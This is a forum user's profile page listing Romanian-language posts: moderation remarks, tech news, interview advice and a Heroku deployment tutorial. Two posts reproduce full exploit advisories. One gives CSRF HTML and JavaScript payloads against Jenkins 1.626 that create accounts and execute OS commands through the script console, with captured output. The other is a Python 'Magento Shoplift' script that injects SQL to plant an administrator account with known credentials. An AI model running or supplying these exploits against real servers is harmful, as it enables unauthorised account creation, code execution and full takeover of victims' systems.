Jump to content

hades

Active Members
  • Posts

    1494
  • Joined

  • Last visited

  • Days Won

    15

Everything posted by hades

  1. Ceva imi spune ca @io.kent o sa ramana banat in continuare
  2. @wildchild o sa ma interesez personal de situatia ta maine.
  3. Salutari. 1. Magento, ca si solutie de e-commerence, necesita foarte multa antentie atunci cand vine vorba de configurarea serverului. Multi ar spune ca sunt un hater borat, dar intotdeauna am preferat platformele construite direct dupa nevoile clientilor. Poate pentru inceput, pentru a testa cum este 'piata', a-i putea incerca Wordpress, mai apoi migrand spre magento sau ceva custom. Evident, ceva custom te-ar costa bani in plus. 2. In functie de furnizor se poate determina cum va fi facut data-scrapingul. Sunt destul de multe persoane pe-aici ce se ocupa cu asta pe siteurile de freelancing. Volumul de munca variaza de la site la site si este afectat de informatiile de care ai nevoie. 3. Importul in magazinul actual poate fi facut direct in DB. Proiectul nu e ceva de 'mici dimensiuni' dar nici ceva extravagant. Totul se rezuma la ceea ce ai si ceea ce doresti intr-un anumit timeframe.
  4. # Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution # Date: 27.08.15 # Vendor: jenkins-ci.org # Affected versions: => 1.626 (current) # Software link: http://mirrors.jenkins-ci.org/war/latest/jenkins.war # Tested on: win64 # Author: Smash_ # Contact: smash [at] devilteam.pl Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to hjiack the authentication of users for most request. Using CSRF it is able to change specific settings or even execute code on os as shown below. Examples: <html> <!-- Change user descripton --> <body> <form action="http://127.0.0.1/jenkins/user/user/submitDescription" method="POST"> <input type="hidden" name="description" value="abc" /> <input type="hidden" name="json" value="{"description": "abc"}" /> <input type="hidden" name="Submit" value="Submit" /> <input type="submit" value="Go" /> </form> </body> </html> <!-- // --> <html> <!-- Add user --> <body> <form action="http://127.0.0.1/jenkins/securityRealm/createAccountByAdmin" method="POST"> <input type="hidden" name="username" value="csrf" /> <input type="hidden" name="password1" value="pass" /> <input type="hidden" name="password2" value="pass" /> <input type="hidden" name="fullname" value="Legit Bob" /> <input type="hidden" name="email" value="bob@mail.box" /> <input type="hidden" name="json" value="{"username": "csrf", "password1": "pass", "password2": "pass", "fullname": "Legit Bob", "email": "bob@mail.box"}" /> <input type="hidden" name="Submit" value="Sign up" /> <input type="submit" value="Go" /> </form> </body> </html> <!-- // --> <html> <!-- Delete user --> <body> <form action="http://127.0.0.1/jenkins/user/csrf/doDelete" method="POST"> <input type="hidden" name="json" value="{}" /> <input type="hidden" name="Submit" value="Yes" /> <input type="submit" value="Go" /> </form> </body> </html> <!-- // --> <html> <!-- Code execution #1 groovy: print "cmd /c dir".execute().text --> <body> <form action="http://127.0.0.1/jenkins/script" method="POST"> <input type="hidden" name="script" value="print "cmd /c dir".execute().text " /> <input type="hidden" name="json" value="{"script": "print \"cmd /c dir\".execute().text\n", "": ""}" /> <input type="hidden" name="Submit" value="Wykonaj" /> <input type="submit" value="Go" /> </form> </body> </html> <html> <!-- Code execution #2 groovy: print "cmd /c dir".execute().text --> <body> <script> var xhr = new XMLHttpRequest(); xhr.open("POST", "http://127.0.0.1/jenkins/computer/(master)/script", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.withCredentials = true; var body = "script=println+%22cmd+%2Fc+dir%22.execute%28%29.text&json=%7B%22script%22%3A+%22println+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); </body> </html> Request: POST /jenkins/script HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/jenkins/script Cookie: JSESSIONID=E8F948238B2F4D6DAFAF191F074E6C3E; screenResolution=1600x900 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 178 script=print+%22cmd+%2Fc+dir%22.execute%28%29.text%0D%0A&json=%7B%22script%22%3A+%22print+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%5Cn%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj Response: HTTP/1.1 200 OK Date: Thu, 27 Aug 2015 18:06:55 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Expires: 0 Cache-Control: no-cache,no-store,must-revalidate X-Hudson-Theme: default X-Hudson: 1.395 X-Jenkins: 1.626 X-Jenkins-Session: 0ff3a92b X-Hudson-CLI-Port: 1834 X-Jenkins-CLI-Port: 1834 X-Jenkins-CLI2-Port: 1834 X-Frame-Options: sameorigin X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoMa5pk8H/b/c/jIOBH+D8XGi2/1MUshSuGtK41S9ON67SRR1Dzmqlzhj+Hsgla6+NJDCFKqZf3aoQbgt8nVzQRkb12bjYPHMupa58SApxwIyvhRJaNq9jq+CcllEwt9m+N1JeCxeLork82LAbiDSBbPhHBGLzqA0a9hzKVTm80i9yiTqDoEK+WyK4m8AyqJFH/V4lkERKbSr2YK1u2sFGCuBaGAK/RYspmNmJSqj0c3lPEYeDsehTSn4PHpFrbsvKkHKD1RxNDRciSFMNY3RtxpBEhKxvJHkpy9HKF+ktYebwCMZ4J8LKnhkvwqJPgpqar3FuxX4Gsfwoy0/1oCtPQIDAQAB X-SSH-Endpoint: 127.0.0.1:1832 Content-Type: text/html;charset=UTF-8 Content-Length: 13468 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive (...) ><link rel='stylesheet' href='/jenkins/adjuncts/0ff3a92b/org/kohsuke/stapler/codemirror/theme/default.css' type='text/css' /><h2>Rezultat</h2><pre> Wolumin w stacji C to Windows7_OS Numer seryjny woluminu: D2DC-59F9 Katalog: C:\Bitnami\jenkins-1.626-0 2015-08-27 18:51 <DIR> . 2015-08-27 18:51 <DIR> .. 2015-08-27 18:47 <DIR> apache-tomcat 2015-08-27 18:47 <DIR> apache2 2015-08-27 18:47 <DIR> apps 2015-08-27 18:49 9?751 changelog.txt 2015-08-27 18:47 <DIR> common 2015-08-27 18:48 <DIR> git 2015-08-27 18:49 <DIR> gradle 2015-08-27 18:47 <DIR> img 2015-08-27 18:47 <DIR> java 2015-08-27 18:47 <DIR> licenses 2015-07-30 14:15 3?080?056 manager-windows.exe 2015-08-27 18:50 1?102 properties.ini 2015-08-27 18:49 12?118 README.txt 2015-08-27 18:50 <DIR> scripts 2015-08-27 18:47 5?536 serviceinstall.bat 2015-08-27 18:47 5?724 servicerun.bat 2015-08-27 18:47 <DIR> sqlite 2015-08-27 18:51 268?031 uninstall.dat 2015-08-27 18:51 7?038?369 uninstall.exe 2015-08-27 18:50 166 use_jenkins.bat 9 plik(?w) 10?420?853 bajt?w 13 katalog(?w) 110?690?426?880 bajt?w wolnych </pre></div> (...) Sursa
  5. Vinerea nu se lucreaza, se citeste, moron.
  6. Cred ca dresa lui e: dogecoin: dKb8zoXmeA3Pk2eBchEtTxGkJndMMxRRNJ S-a pus automat smiley la ":" + "d"
  7. Ai citit comentariul de pe sourceforge? Daca da, ce cauta mizeria asta aici?
  8. ################################################################################################## #Exploit Title : Magento Shoplift exploit (SUPEE-5344) #Author : Manish Kishan Tanwar AKA error1046 #Date : 25/08/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi #Debugged At : Indishell Lab(originally developed by joren) ################################################################################################## //////////////////////// /// Overview: //////////////////////// Magento shoplift bug originally discovered by CheckPoint team (http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/) This python script developed by joren but it was having some bug because of which it was not working properly. If magento version is vulnerable, this script will create admin account with username forme and password forme //////////////// /// POC //// /////////////// Exploit script starts here /////////////////// #Thanks to # Zero cool, code breaker ICA, Team indishell, my father , rr mam, jagriti and DON import requests import base64 import sys target = "http://target.com/" if not target.startswith("http"): target = "http://" + target if target.endswith("/"): target = target[:-1] target_url = target + "/admin/Cms_Wysiwyg/directive/index/" q=""" SET @extra,NULL, NOW()); INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname'); """ query = q.replace("\n", "").format(username="forme", password="forme") pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query) # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}} r = requests.post(target_url, data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ", "filter": base64.b64encode(pfilter), "forwarded": 1}) if r.ok: print "WORKED" print "Check {0}/admin with creds forme:forme".format(target) else: print "DID NOT WORK" ///////////////// exploit code ends here Sursa
  9. Ce-i ala XSS? Raspunde-ti la intrebarea asta si iti dai seama singur ce trebuie sa inveti.
  10. Cica nemtii au dat Americanilor log-uri interceptate de la cetatenii lor la schimb pentru o copie de XKeyscore. XKeyscore e un program de supraveghere ce se instaleaza pe retea, conceput de NSA ca sa stie la ce poze cu pisici se uita lumea. Via
  11. Vor fi intrebari legate de algoritmi si optimizari. Mai mult ca sigur te vor intreba niste metode de sortare pentru liste; Pentru oop ii intereseaza de constructori/mosteniri (strong inheritance, etc). Suprascrierea de metode, multiple inheritance (nici nu stiu daca se practica in alte limbaje decat python, lol), si..algoritmi. Erau pe filelist niste cursuri de la Lynda.com despre OOP. Foarte bune.
  12. In caz ca scrieti python (sau php, nodejs, etc) si vreti sa aveti un enviroment de 'test' unde sa deployati aplicatia, puteti folosi cu incredere heroku (Cloud Application Platform) Eu folosesc heroku pentru deploy-ul aplicatiilor Django si ceea ce-mi place, e faptul ca nu trebuie sa-mi bat capul cu configurari multe pentru un enviroment de test (configurari de genu' asta). Asa ca, aici un mini tutorial introductiv despre deploy-ul aplicatiei pe heroku: 1. Instalati Heroku Toolbelt (venv)~/p/s/project git:develop ??? wget -O- https://toolbelt.heroku.com/install-ubuntu.sh | sh 2. Va logati cu credential-urile de pe heroku (venv)~/p/s/project git:develop ??? heroku login O sa vi se ceara username/password. 3. Presupunand ca sunteti in directorul cu aplicatia: Creati un fisier Procfile care o sa ruleze wsgi-ul pentru app (wsgi pentru ca vorbesc de python acum) Ceva de genu: web: gunicorn projectdjango.wsgi --log-file - S-aveti grija sa puneti in requirements.txt gunicorn-ul in cazul de fata. In momentul deploy-ului Dyno-ul de la Heroku o sa se uite-n requirements.txt si o sa instaleze automat toate dependintele. 4. Creem un repo remote la heroku Initializam repo (in cazul in care nu aveti deja unul ce-l folositi pe bitbucket/github) git init Facem un repository remote in care o sa pushuiti codul heroku create 5. Deploy-ul efectiv: git push heroku master In linii mari, ceea ce se intampla consta in faptul ca serverului vostru de pe heroku i se asociaza un repo; in momentul in care voi faceti push in repo-ul remote, dyno-ul de la heroku va sti sa faca pull + install requirements + restart gunicorn. Daca aveti nelamuriri, o sa incerc sa raspund.
  13. Salut. Multumim de introducere. Nu ai specificat nimic concret legat de cunostiintele tale. Pentru o experienta placuta pe forum, te-as ruga sa nu mai redeschizi threaduri vechi de 2 ani. Multumesc si sedere placuta.
  14. 220.000 conturi de icloud comprimise dupa ce utilizatorii au incercat sa-si faca jailbreak la device cu ceva metode shady. Asa ca, atentie la cine mergeti cu telefonu pentru jailbreak sau ce tutoriale urmati. Via
  15. Daca aveti ceva de impartit va recomand sa o faceti intr-un mod civilizat; Cand spuneti ca X a dat teapa pregatiti si dovezi care sa sustina teoria voastra. Altfel, se cam intinde off-topicul pe-aici. TC.
  16. Probabil e tepar. Pentru viitor, incearca sa nu mai 'ajuti' anonimi de pe internet.
  17. @q111: Ia-o-ncet Reckon.
  18. Daca dai DDoS in cineva care nu a facut rau la nimeni si promoveaza open-source-ul, inseamna ca esti un mucos ordinar. Totusi, intrebarea ta pare putin cam downy.
  19. Mai multi ISP de prin Austria au fost somati de catre IFPI Austria (ceva asociatie ce are legatura cu industria muzicala de pe-acolo) sa blocheze accesul clientilor la The Pirate Bay. T-mobile a avut decenta sa refuze. Via.
  20. Inchis. Nu ne ardem intre noi cu rahaturi.
  21. Numarul de posturi cerut pentru a posta la market nu e acolo doar ca sa fie forumul mai cu 3 coaie. Rostul lui e acela de a incuraja 'afacerile' intre si cu membrii activi/seriosi ai forumului. Faptul ca tu postezi pentru el fara sa-ti asumi responsabilitatea pentru bunul mers al lucrurilor nu schimba cu nimic treaba.
  22. @DeMoN23: Si oare de ce nu mai poate posta colegul tau la RST Market?
  23. Raymond Hettinger e Python Core Developer. Deci stie ce vorbeste; stie si cum sa vorbeasca. Numa bun de urmarit la o cafea. Super considered super: Python objects:
  24. GitHub si-a luat DDoS de prin China, cica. Inca o dovada ca DDoS-ul e arma tuturor incultilor. De-aici.
×
×
  • Create New...